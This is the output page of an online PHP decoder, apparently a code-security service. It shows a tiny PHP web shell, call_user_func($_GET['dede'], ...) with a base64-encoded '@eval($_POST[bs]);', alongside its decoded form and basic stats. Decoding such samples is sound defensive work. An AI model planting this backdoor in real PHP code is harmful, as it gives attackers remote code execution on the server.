Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php //call_user_func($_GET['dede'], "@eval($_POST[bs]);"); call_user_func($_GET..
Decoded Output download
<?php
//call_user_func($_GET['dede'], "@eval($_POST[bs]);");
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Did this file decode correctly?
Original Code
<?php
//call_user_func($_GET['dede'], "@eval($_POST[bs]);");
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Function Calls
null | 1 |
base64_decode | 1 |
call_user_func | 1 |
Stats
MD5 | c41be44fc6740756ca4b07afbca0eae0 |
Eval Count | 0 |
Decode Time | 98 ms |